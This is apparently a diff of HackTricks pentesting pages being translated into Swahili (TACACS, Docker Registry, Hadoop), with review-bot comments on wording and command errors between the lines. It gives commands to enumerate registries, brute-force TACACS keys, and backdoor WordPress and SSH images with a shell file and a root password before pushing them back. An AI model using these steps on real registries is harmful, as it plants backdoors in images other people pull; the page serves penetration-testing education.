Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,56 +23,57 @@ Njia nyingine za kusaidia HackTricks:
***
## Taarifa Msingi
## Basic Information
Itifaki ya **Terminal Access Controller Access Control System (TACACS)** hutumika kwa kuthibitisha watumiaji kwa kati wanajaribu kupata mitambo au Seva za Kufikia Mtandao (NAS). Toleo lake lililoboreshwa, **TACACS+**, linagawanya huduma katika uthibitishaji, idhini, na uhasibu (AAA).
**Mfumo wa Kudhibiti Upatikanaji wa Kituo (TACACS)** unatumika kuthibitisha watumiaji kwa kati wanaojaribu kufikia route au Seva za Upatikanaji wa Mtandao (NAS). Toleo lake lililoboreshwa, **TACACS+**, linatenganisha huduma katika uthibitishaji, idhini, na uhasibu (AAA).
```
PORT STATE SERVICE
49/tcp open tacacs
```
**Bandari ya chaguo:** 49
**Default port:** 49
## Kukamata Kitufe cha Uthibitisho
## Intercept Authentication Key
Ikiwa mawasiliano kati ya mteja na seva ya TACACS yamekamatwa na mkaidi, **kitufe cha uthibitisho kilichofichwa kinaweza kukamatwa**. Mkaidi kisha anaweza kujaribu **shambulio la nguvu dhidi ya kitufe kwa usahihi bila kugunduliwa kwenye magogo**. Ikiwa shambulio la nguvu dhidi ya kitufe linafanikiwa, mkaidi anapata ufikiaji wa vifaa vya mtandao na anaweza kufichua trafiki kwa kutumia zana kama Wireshark.
Ikiwa mawasiliano kati ya mteja na seva ya TACACS yanakatizwa na mshambuliaji, **funguo ya uthibitishaji iliyosimbwa inaweza kukamatwa**. Mshambuliaji anaweza kisha kujaribu **shambulio la nguvu za ndani dhidi ya funguo bila kugundulika katika kumbukumbu**. Ikiwa atafanikiwa katika kujaribu nguvu funguo, mshambuliaji anapata ufikiaji wa vifaa vya mtandao na anaweza kufungua trafiki kwa kutumia zana kama Wireshark.
### Kutekeleza Shambulio la MitM
### Performing a MitM Attack
Shambulio la **ARP spoofing linaweza kutumika kutekeleza shambulio la Man-in-the-Middle (MitM)**.
**Shambulio la ARP spoofing linaweza kutumika kufanya shambulio la Man-in-the-Middle (MitM)**.
### Shambulio la Nguvu dhidi ya Kitufe
### Brute-forcing the Key
[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) inaweza kutumika kufanya shambulio la nguvu dhidi ya kitufe:
[Loki](https://c0decafe.de/svn/codename\_loki/trunk/) inaweza kutumika kujaribu nguvu funguo:
```
sudo loki_gtk.py
```
Ikiwa funguo inabainishwa kwa mafanikio **(kawaida katika muundo uliofichwa wa MD5)**, **tunaweza kupata ufikiaji wa vifaa na kufichua trafiki iliyofichwa ya TACACS.**
If the key is successfully **bruteforced** (**usually in MD5 encrypted format)**, **we can access the equipment and decrypt the TACACS-encrypted traffic.**
### Kufichua Trafiki
Baada ya funguo kubainishwa kwa mafanikio, hatua inayofuata ni **kufichua trafiki iliyofichwa ya TACACS**. Wireshark inaweza kushughulikia trafiki iliyofichwa ya TACACS ikiwa funguo imetolewa. Kwa kuchambua trafiki iliyofichuliwa, habari kama **bango lililotumiwa na jina la mtumiaji wa mtumiaji wa usimamizi** inaweza kupatikana.
### Decrypting Traffic
Once the key is successfully cracked, the next step is to **decrypt the TACACS-encrypted traffic**. Wireshark can handle encrypted TACACS traffic if the key is provided. By analyzing the decrypted traffic, information such as the **banner used and the username of the admin** user can be obtained.
Kwa kupata ufikiaji wa kisanduku cha kudhibiti cha vifaa vya mtandao kwa kutumia sifa zilizopatikana, mshambuliaji anaweza kudhibiti mtandao. Ni muhimu kutambua kuwa hatua hizi ni kwa madhumuni ya elimu tu na hazipaswi kutumiwa bila idhini sahihi.
By gaining access to the control panel of network equipment using the obtained credentials, the attacker can exert control over the network. It's important to note that these actions are strictly for educational purposes and should not be used without proper authorization.
## Marejeo
## References
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,61 +1,55 @@
# 5000 - Pentesting Docker Registry
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Mfumo wa uhifadhi na usambazaji unaojulikana kama **Docker registry** umewekwa kwa ajili ya picha za Docker ambazo zina majina na zinaweza kuja katika toleo mbalimbali, zilizotofautishwa na vitambulisho. Picha hizi zimepangwa ndani ya **maktaba za Docker** kwenye usajili, kila maktaba ikihifadhi toleo mbalimbali la picha fulani. Utendaji unaotolewa unaruhusu picha kupakuliwa kwa kifaa au kupakiwa kwenye usajili, ikizingatiwa kuwa mtumiaji ana ruhusa inayohitajika.
Mfumo wa kuhifadhi na kusambaza unaojulikana kama **Docker registry** umewekwa kwa ajili ya picha za Docker ambazo zimepewa majina na zinaweza kuja katika matoleo mbalimbali, yanayofautishwa na lebo. Picha hizi zimeandaliwa ndani ya **Docker repositories** katika registry, kila repository ikihifadhi matoleo mbalimbali ya picha maalum. Uwezo unaotolewa unaruhusu picha kupakuliwa kwa ndani au kupakiwa kwenye registry, ikiwa mtumiaji ana ruhusa zinazohitajika.
**DockerHub** hutumika kama usajili wa umma wa msingi kwa Docker, lakini watumiaji pia wana chaguo la kuendesha toleo la ndani la usajili/distribusheni ya Docker ya chanzo wazi au kuchagua **Docker Trusted Registry** inayoungwa mkono kibiashara. Aidha, usajili mbalimbali wa umma unaweza kupatikana mtandaoni.
Kupakua picha kutoka kwenye usajili wa ndani, amri ifuatayo hutumiwa:
**DockerHub** inatumika kama registry ya umma ya default kwa Docker, lakini watumiaji pia wana chaguo la kufanya kazi na toleo la ndani la Docker registry/distribution ya chanzo wazi au kuchagua **Docker Trusted Registry** inayoungwa mkono kibiashara. Zaidi ya hayo, registry mbalimbali za umma zinaweza kupatikana mtandaoni.
Ili kupakua picha kutoka kwa registry ya ndani, amri ifuatayo inatumika:
```bash
docker pull my-registry:9000/foo/bar:2.1
```
Hii amri inapata picha ya `foo/bar` toleo `2.1` kutoka kwenye usajili wa ndani kwenye kikoa cha `my-registry` kwenye bandari ya `9000`. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa `2.1` ni toleo jipya, amri inakuwa:
Hii amri inapata picha ya `foo/bar` toleo `2.1` kutoka kwenye rejista ya ndani kwenye kikoa cha `my-registry` kwenye bandari `9000`. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa `2.1` ndiyo toleo jipya zaidi, amri inakuwa rahisi:
```bash
docker pull foo/bar
```
**Bandari ya chaguo-msingi:** 5000
**Default port:** 5000
```
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
## Kugundua
Njia rahisi ya kugundua huduma hii inayotumika ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kama ni huduma inayotegemea HTTP inaweza kuwa nyuma ya wakala wa HTTP na nmap haitaigundua.\
Baadhi ya alama za vidole:
Njia rahisi ya kugundua huduma hii inayoendesha ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kwa kuwa ni huduma inayotumia HTTP inaweza kuwa nyuma ya proxies za HTTP na nmap haitagundua.\
Baadhi ya alama:
* Ukifika `/` hakuna kitu kinachorudi kwenye jibu
* Ukifika `/v2/` basi `{}` inarudi
* Ukifika `/v2/_catalog` unaweza kupata:
* Ikiwa unafikia `/` hakuna kinachorejeshwa kwenye jibu
* Ikiwa unafikia `/v2/` basi `{}` inarejeshwa
* Ikiwa unafikia `/v2/_catalog` unaweza kupata:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
## Uchambuzi
## Uhesabu
### HTTP/HTTPS
Usajili wa Docker unaweza kuwa umewekwa kutumia **HTTP** au **HTTPS**. Kwa hivyo, jambo la kwanza unaloweza kulazimika kufanya ni **kugundua ni ipi** inayowekwa:
Docker registry inaweza kuwekewa mipangilio kutumia **HTTP** au **HTTPS**. Hivyo jambo la kwanza unalohitaji kufanya ni **kupata ni ipi** inayopangwa:
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
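Review bot: the section headings in the retranslated file come out in a mix of languages and terms: `## Basic Information` and `**Default port:** 5000` stay in English while the neighbouring `## Kugundua` and `## Uhesabu` are Swahili, and "Enumeration" is rendered three different ways in this one file (`Uhesabu`, `Uchambuzi kwa kutumia ...`, `Uhesabuji kwa kutumia docker`). Settle on one word and one language for headings before merging. One wording point in the same hunk: the text says `docker pull foo/bar` fetches version `2.1` "if 2.1 is the latest version"; an untagged pull resolves the `latest` tag, which only coincides with `2.1` when the maintainers point `latest` at that build, so say "fetches the `latest` tag" rather than tying it to `2.1`.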
@ -66,11 +60,9 @@ Warning: <FILE>" to save to a file.
#If HTTP
{"repositories":["alpine","ubuntu"]}
```
### Authentication
### Uthibitisho
Docker registry inaweza pia kusanidiwa kuhitaji **uthibitisho**:
Docker registry inaweza pia kuwekewa mipangilio ili kuhitaji **authentication**:
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
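Review bot: the authentication probe `curl -k https://192.25.197.3:5000/v2/_catalog` uses a different host from every other example on the page (`10.10.10.10:5000`), and 192.25.197.3 is neither a private nor a documentation range, so a reader who copies the line will send the request to a real address. Use the same `10.10.10.10` placeholder here and keep `-k` only where the HTTPS case is meant.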
@ -78,18 +70,14 @@ curl -k https://192.25.197.3:5000/v2/_catalog
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
Ikiwa Usajili wa Docker unahitaji uthibitisho unaweza [**jaribu kuvunja nguvu kutumia hii**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**Ikiwa unapata sifa halali utahitaji kuzitumia** kuchambua usajili, katika `curl` unaweza kuzitumia kama hivi:
Ikiwa Docker Registry inahitaji uthibitisho unaweza [**kujaribu kuikandamiza kwa kutumia hii**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**Ikiwa utapata akidi halali utahitaji kuzitumia** kuhesabu rejista, katika `curl` unaweza kuzitumia kama hii:
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
### Enumeration using DockerRegistryGrabber
### Uchambuzi kwa kutumia DockerRegistryGrabber
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) ni chombo cha python cha kuchambua / kudump docker registry (bila au na uthibitishaji wa msingi)
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) ni chombo cha python cha kuorodhesha / kutupa docker degistry (bila au na uthibitisho wa msingi)
```bash
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url
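Review bot: the new description of DockerRegistryGrabber reads "kuorodhesha / kutupa docker degistry": `degistry` is a typo for `registry`, and `kutupa` ("throw away") misrenders "dump"; the earlier `kudump` was at least unambiguous, so either keep the English term or use a word that means "extract". The link text "kujaribu kuikandamiza" for "try to brute-force it" has the same problem ("kuikandamiza" is "to press/squeeze"); keeping the English "brute-force" as the link anchor matches the target page. It would also help to say, next to the `curl -k -u username:password ...` example, that the `-U USERNAME` and `-P PASSWORD` flags in the `drg.py` usage line are the equivalent for the tool.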
@ -163,11 +151,9 @@ python3 DockerGraber.py http://127.0.0.1 --dump_all
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
```
### Enumeration using curl
### Uchambuzi kwa kutumia curl
Mara baada ya **kupata ufikivu wa docker registry** hapa kuna baadhi ya amri unazoweza kutumia kuchambua:
Mara tu umepata **ufikiaji wa docker registry** hapa kuna baadhi ya amri unazoweza kutumia kuhesabu:
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
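Review bot: the curl enumeration commands that follow (`curl -s http://10.10.10.10:5000/v2/_catalog` and the rest of the block) carry no `-u` even though the previous section says valid credentials must be reused for enumeration. Either add `-k -u username:password` to these examples or state up front that the block assumes an unauthenticated HTTP registry.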
@ -230,13 +216,11 @@ curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fa
#Inspect the insides of each blob
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
```
{% hint style="warning" %}
Tafadhali kumbuka kwamba unapopakua na kufungua faili za blobs, faili na folda zitaonekana kwenye saraka ya sasa. **Ikiwa unapakua blobs zote na kuzifungua kwenye saraka moja zitafuta thamani kutoka kwa blobs zilizofunguliwa awali**, kwa hivyo kuwa mwangalifu. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya saraka tofauti ili uchunguze maudhui halisi ya kila blob.
Kumbuka kwamba unaposhusha na kufungua faili za blobs, folda zitaonekana katika saraka ya sasa. **Ikiwa unashusha blobs zote na kuzifungua katika folda moja, zitaandika thamani kutoka kwa blobs zilizofunguliwa awali**, hivyo kuwa makini. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya folda tofauti ili kukagua maudhui halisi ya kila blob.
{% endhint %}
### Uchambuzi kwa kutumia docker
### Uhesabuji kwa kutumia docker
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
@ -255,11 +239,10 @@ docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
### Kuingiza Backdoor kwenye picha ya WordPress
### Kuweka mlango nyuma kwa picha ya WordPress
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuweka mlango nyuma.\
**Tengeneza** mlango **nyuma**:
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuingiza backdoor.\
**Unda** backdoor:
{% code title="shell.php" %}
```bash
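Review bot: the warning says that untarring every blob into the same directory overwrites files from earlier blobs, but the command the page shows (`tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory`) does exactly that; make the advice concrete, e.g. `mkdir blob1 && tar -xf blob1.tar -C blob1`, so each layer lands in its own directory. Two smaller points in the docker block: `docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container` runs `bash` while the comment says `ash`, and the container being started is `10.10.10.10:5000/ubuntu`, so fix the comment; and the container ID is a value from the author's own run, so say that it is taken from the preceding `docker ps` output.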
@ -267,62 +250,70 @@ Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza
```
{% endcode %}
Tengeneza **Dockerfile**:
Unda **Dockerfile**:
{% code title="Dockerfile" %}
```
```
{% endcode %}
```bash
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
{% endcode %}
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **sukuma**:
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **tuma** hiyo:
```bash
docker build -t 10.10.10.10:5000/wordpress .
#Create
docker images
docker push registry:5000/wordpress #Push it
```
### Backdooring SSH server image
### Kuweka mlango wa nyuma kwenye picha ya seva ya SSH
Fikiria umepata Docker Registry na picha ya SSH na unataka kuweka mlango wa nyuma.\
**Pakua** picha hiyo na **itekeleze**:
Kufikiria kwamba umepata Docker Registry yenye picha ya SSH na unataka kuingiza nyuma.\
**Pakua** picha hiyo na **endesha**:
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
Chambua faili ya `sshd_config` kutoka kwenye picha ya SSH:
Kutoa faili la `sshd_config` kutoka kwenye picha ya SSH:
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
Na ibadilishe ili kuweka: `PermitRootLogin yes`
Na ubadilishe ili kuweka: `PermitRootLogin yes`
Unda **Dockerfile** kama ifuatavyo:
Unda **Dockerfile** kama ule ufuatao:
{% tabs %}
{% tab title="Dockerfile" %}
```bash
FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd
```
{% endtab %}
{% endtabs %}
**Unda** picha mpya, **angalia** ikiwa imeundwa, na **sukuma** hiyo:
```bash
docker build -t 10.10.10.10:5000/sshd-docker-cli .
#Create
docker images
docker push registry:5000/sshd-docker-cli #Push it
```
## References
* [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
\`\`\`bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd\_config /etc/ssh/ RUN echo root:password | chpasswd \`\`\` \*\*Unda\*\* picha mpya, \*\*angalia\*\* imeundwa, na \*\*sukuma\*\*: \`\`\`bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it \`\`\` ## Marejeo \* \[https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/]\(https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
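Review bot: both backdoor walkthroughs build and push under different names: `docker build -t 10.10.10.10:5000/wordpress .` followed by `docker push registry:5000/wordpress #Push it`, and the same pair for `sshd-docker-cli`. `docker push` looks up the local image by the exact tag, so with the commands as written the push fails with an image-not-found error; the push target must be `10.10.10.10:5000/wordpress` (or the image must first be re-tagged with `docker tag`). The WordPress Dockerfile block is also duplicated: an empty `{% code title="Dockerfile" %}` / `{% endcode %}` pair precedes the real ```bash block, which is then closed by a second, dangling `{% endcode %}`; drop the empty pair. Finally, the SSH Dockerfile tab block is followed by a copy of the same content collapsed into one line with escaped backticks (`\`\`\`bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd\_config /etc/ssh/ ...`), running on into the References heading; that line is a rendering artifact of the translation and should be removed, keeping the structured version above it.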

View file

@ -1,23 +1,24 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa Msingi**
# **Taarifa za Msingi**
**Apache Hadoop** ni **mfumo wa chanzo wazi** kwa **uhifadhi na usindikaji uliogawanyika** wa **seti kubwa za data** kwenye **vifurushi vya kompyuta**. Inatumia **HDFS** kwa uhifadhi na **MapReduce** kwa usindikaji.
**Apache Hadoop** ni **mfumo wa wazi** wa **hifadhi na usindikaji** wa **seti kubwa za data** katika **vikundi vya kompyuta**. Inatumia **HDFS** kwa ajili ya hifadhi na **MapReduce** kwa ajili ya usindikaji.
Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa kudokumenti. Walakini, unaweza kutumia **Nmap scripts** zifuatazo kuchunguza huduma za Hadoop:
Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa uandishi wa hati hii. Hata hivyo, unaweza kutumia **Nmap scripts** zifuatazo kuorodhesha huduma za Hadoop:
- **`hadoop-jobtracker-info (Port 50030)`**
